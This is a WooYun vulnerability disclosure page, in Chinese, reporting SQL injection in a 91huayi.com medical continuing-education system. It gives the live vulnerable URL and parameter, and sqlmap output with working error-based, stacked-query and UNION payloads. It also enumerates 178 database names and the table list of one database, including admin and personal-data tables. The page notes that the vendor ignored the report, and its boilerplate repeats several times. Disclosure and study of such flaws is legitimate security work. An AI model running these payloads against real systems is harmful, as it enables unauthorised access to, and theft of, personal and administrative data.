华医网某系统存在SQL注入漏洞 | wooyun-2015-0156600| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0156600

漏洞标题：华医网某系统存在SQL注入漏洞

漏洞作者：路人甲

提交时间：2015-11-30 10:43

修复时间：2015-12-05 10:44

公开时间：2015-12-05 10:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-30：细节已通知厂商并且等待厂商处理中
2015-12-05：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

http://cme.gxwskjw.91huayi.com/report/publicedPassedSummary.aspx?displayMode=1&frontForUnit=1&holdYear=11&lowUnitCode=200001&principalName=xpvmpofb&projectCode=94102&projectKind=%C8%AB%B2%BF&projectName=ibthlwvx&publicBatch=-1&state=publicedList&subject2=01&subject3=0101

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: holdYear (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: displayMode=1&frontForUnit=1&holdYear=11' AND 4171=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (4171=4171) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113))) AND 'wJBu'='wJBu&lowUnitCode=200001&principalName=xpvmpofb&projectCode=94102&projectKind=%C8%AB%B2%BF&projectName=ibthlwvx&publicBatch=-1&state=publicedList&subject2=01&subject3=0101
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: displayMode=1&frontForUnit=1&holdYear=11';WAITFOR DELAY '0:0:5'--&lowUnitCode=200001&principalName=xpvmpofb&projectCode=94102&projectKind=%C8%AB%B2%BF&projectName=ibthlwvx&publicBatch=-1&state=publicedList&subject2=01&subject3=0101
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: displayMode=1&frontForUnit=1&holdYear=11' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(99)+CHAR(72)+CHAR(97)+CHAR(116)+CHAR(88)+CHAR(101)+CHAR(86)+CHAR(79)+CHAR(70)+CHAR(70)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113)-- &lowUnitCode=200001&principalName=xpvmpofb&projectCode=94102&projectKind=%C8%AB%B2%BF&projectName=ibthlwvx&publicBatch=-1&state=publicedList&subject2=01&subject3=0101
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [178]:
[*] 0724zkys
[*] baicheng_wsglw
[*] baishan_wsglw
[*] BJ_JJPT
[*] BjApply
[*] bjhp0801
[*] ccme
[*] changchun_wsglw
[*] cme_beihai
[*] cme_binzhou
[*] cme_bj
[*] cme_haikou
[*] cme_hezhou
[*] cme_leshan
[*] cme_local_common
[*] cme_luzhou
[*] cme_meishan
[*] cme_middle_kjpt
[*] cme_sd
[*] cme_shenyang2
[*] cme_shiyan2
[*] cme_shiyan3
[*] cme_wenzhou2
[*] cme_wenzhou3
[*] cme_xjyfy
[*] cme_yanbianzhou
[*] cme_yanshi
[*] cme_yantai
[*] cme_yibin
[*] cme_yiwu
[*] cme_yunfu
[*] cme_ziyang
[*] cqwsw.net
[*] czwsw
[*] dlzwsw.91huayi
[*] DS_HY_COMMON
[*] exambd
[*] ezine_wenzhou
[*] ezine_yiwu2011
[*] gd_wj
[*] GPSS
[*] GSYXH
[*] gxav
[*] gxwskjw
[*] haoyisheng_guangdong
[*] haoyisheng_shenzhen
[*] hbno_mt
[*] hljnk
[*] hljwsw
[*] hncme
[*] hpexam0801
[*] hpexam_fj
[*] hpexam_sz
[*] hpst
[*] hy_com_shenyang
[*] hy_com_shiyan
[*] HY_ZhuanGang
[*] hyzc
[*] hzwj
[*] hzwsw.net
[*] jlshi
[*] kjpt_cme
[*] kjpt_common
[*] kjpt_data_upgrade_hb
[*] kjpt_data_upgrade_海南
[*] kjpt_posdata_swap
[*] kmwsw
[*] liaoyuan_wsglw
[*] master
[*] material
[*] mmmadb
[*] model
[*] msdb
[*] ncwsw
[*] new_cme_back0813
[*] NnCommDB
[*] pdsCommDB
[*] ppct
[*] praject_apply2
[*] prjapply_dg
[*] prjapply_gdfs
[*] prjapply_gdhy
[*] prjapply_gdjm
[*] prjapply_gdyj
[*] prjapply_gdzq
[*] prjapply_gx
[*] prjapply_hlj
[*] prjapply_jd
[*] prjapply_jl
[*] prjapply_nc
[*] prjapply_sd
[*] prjapply_sdq
[*] prjapply_shiyan
[*] prjapply_sx
[*] prjapply_xian
[*] prjapply_zh
[*] prjapply_zs
[*] project.cqwsw.net
[*] project_apply
[*] project_xj
[*] project_ya
[*] project_yn
[*] ProjectSY
[*] qjwsw
[*] rubbish
[*] sdlc
[*] sfjj
[*] shiyan_wsglw
[*] spwsw
[*] sspa_gxnn
[*] suining_wsglw
[*] swykCommDB
[*] sywsw.cn
[*] taizhou_wsglw
[*] tempdb
[*] tmp
[*] tmpunit海南
[*] toilet_water_apply
[*] tonghua_wsglw
[*] transcript
[*] weinan_wsglw
[*] wh_wsglw
[*] wj_binzhou
[*] wuhan_xmsb
[*] wuhanma.org.cn
[*] xian.wsglw.net
[*] xianyangcme
[*] XJWJ
[*] xnwsw
[*] xuancheng_wsglw
[*] yaan.com
[*] yanbian_wsglw
[*] ylwsw
[*] ynwsw
[*] yulin_wsglw
[*] yunfu
[*] ZJ_ZYYS_Exam
[*] ZJ_ZYYS_Train
[*] zj_zyys_trun
[*] zkys0801
[*] zkys_bj
[*] zkys_cq
[*] zkys_fj0227
[*] zkys_fj_temp
[*] zkys_gs
[*] zkys_gxlz
[*] zkys_nm
[*] zkys_sz
[*] ZYYS_AH_Turn
[*] ZYYS_BJ_Exam
[*] ZYYS_BJ_Train
[*] ZYYS_BJ_Turn0128
[*] ZYYS_BJ_TURN1027
[*] zyys_bj_turn_zy_0813
[*] zyys_cq_dsjyd
[*] zyys_cq_train
[*] zyys_gd_Exam
[*] zyys_gd_train
[*] zyys_gd_Turn
[*] zyys_guangxi_turn
[*] ZYYS_GX_Turn
[*] ZYYS_HN_Exam
[*] ZYYS_HN_Train
[*] ZYYS_HN_Turn
[*] zyys_jd_Exam
[*] zyys_jd_train
[*] zyys_jd_Turn
[*] ZYYS_JL_Exam
[*] ZYYS_JL_Train
[*] ZYYS_JL_Turn_ZY
[*] ZYYS_NMG_Turn
[*] zyys_qfs_turn
[*] zyys_Shan_turn_zy
[*] ZYYS_SX_Turn_ZY
[*] ZYYS_ZJ_Exam_ZY
[*] ZYYS_ZJ_Train_ZY
[*] ZYYS_ZJ_Turn_ZY
[*] zyysht

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: holdYear (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: displayMode=1&frontForUnit=1&holdYear=11' AND 4171=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (4171=4171) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113))) AND 'wJBu'='wJBu&lowUnitCode=200001&principalName=xpvmpofb&projectCode=94102&projectKind=%C8%AB%B2%BF&projectName=ibthlwvx&publicBatch=-1&state=publicedList&subject2=01&subject3=0101
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: displayMode=1&frontForUnit=1&holdYear=11';WAITFOR DELAY '0:0:5'--&lowUnitCode=200001&principalName=xpvmpofb&projectCode=94102&projectKind=%C8%AB%B2%BF&projectName=ibthlwvx&publicBatch=-1&state=publicedList&subject2=01&subject3=0101
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: displayMode=1&frontForUnit=1&holdYear=11' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(99)+CHAR(72)+CHAR(97)+CHAR(116)+CHAR(88)+CHAR(101)+CHAR(86)+CHAR(79)+CHAR(70)+CHAR(70)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113)-- &lowUnitCode=200001&principalName=xpvmpofb&projectCode=94102&projectKind=%C8%AB%B2%BF&projectName=ibthlwvx&publicBatch=-1&state=publicedList&subject2=01&subject3=0101
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: cme_bj
[116 tables]
+----------------------------+
| 2014年导入平台全部人员信息                       |
| 2015年区域项目                       |
| 2015年远程课程                       |
| 2015年远程项目_2_2分                   |
| 2015年远程项目_2_3分                   |
| DSJ_comp_dept              |
| DSJ_kjpt_area_state        |
| DSJ_kjpt_person            |
| DSJ_kjpt_score             |
| DSJ_kjpt_unit_state        |
| DSJ_score_level            |
| P1207                      |
| V_studyDept                |
| VhycomDept                 |
| actionlist                 |
| admin_user                 |
| assign_type                |
| bbs_forum                  |
| bbs_thread                 |
| bj_to_hys                  |
| card_detail                |
| card_log                   |
| card_nobind                |
| card_pay_type              |
| card_temp_20111025         |
| card_type_course           |
| card_type_course           |
| card_type_organ_allpay     |
| card_type_organ_allpay     |
| cme_city                   |
| cme_province               |
| course_2014                |
| course_2014                |
| course_dept_2014           |
| course_dept_2014           |
| course_dept_editor         |
| course_editor              |
| course_extr                |
| course_feedback            |
| course_id                  |
| course_no                  |
| course_organ_assign_2014   |
| course_organ_assign_2014   |
| course_organ_assign_editor |
| course_related_2014        |
| course_related_2014        |
| course_related_editor      |
| course_test                |
| course_ware_2014           |
| course_ware_2014           |
| course_ware_editor         |
| course_ware_feedback       |
| course_ware_zhj            |
| default_page_pic           |
| dept_facade_related        |
| dept_facade_related        |
| dictionary_kind            |
| dictionary_kind            |
| expert_dept                |
| expert_dept                |
| gjj                        |
| hy_com_city                |
| hy_com_county              |
| hy_com_department          |
| hy_com_dept_cme            |
| hy_com_dept_cme            |
| hy_com_dictionary_kind     |
| hy_com_dictionary_kind     |
| hy_com_hospital            |
| hy_com_province            |
| hy_com_user_register       |
| item_leve                  |
| jiangyi                    |
| login_user_id_2014         |
| login_user_id_2014         |
| manager_course             |
| manager_course             |
| manager_group_action       |
| manager_group_action       |
| manager_log                |
| menulist                   |
| nopasshys                  |
| organ_district             |
| organ_district             |
| p1130                      |
| question_2014              |
| question_2014              |
| question_editor            |
| question_option_2014       |
| question_option_2014       |
| question_option_editor     |
| questiontmp                |
| sns_dept                   |
| sp_manager                 |
| study_course_2014          |
| study_course_2014          |
| study_course_log           |
| study_course_ware_2014     |
| study_course_ware_2014     |
| sysdiagrams                |
| tempData                   |
| temp_yt_1                  |
| temp_yt_no_1               |
| temp_yt_no_1               |
| tmp                        |
| ui_list                    |
| urseicno                   |
| user_organ_card            |
| v_cme_studyInfo_setHYS     |
| v_cme_studyInfo_setHYS     |
| v_studyArea                |
| v_study_user_info          |
| web_config                 |
| 北京取消学分处理_20141015                  |
| 北京学习平台学员信息_2015_2                    |
| 北京学习平台学员信息_2015_2                    |
+----------------------------+

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-12-05 10:44

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0156600

漏洞标题：华医网某系统存在SQL注入漏洞

相关厂商：91huayi.com

漏洞作者：路人甲

提交时间：2015-11-30 10:43

修复时间：2015-12-05 10:44

公开时间：2015-12-05 10:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0156600

漏洞标题：华医网某系统存在SQL注入漏洞

相关厂商：91huayi.com

漏洞作者： 路人甲

提交时间：2015-11-30 10:43

修复时间：2015-12-05 10:44

公开时间：2015-12-05 10:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0156600"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云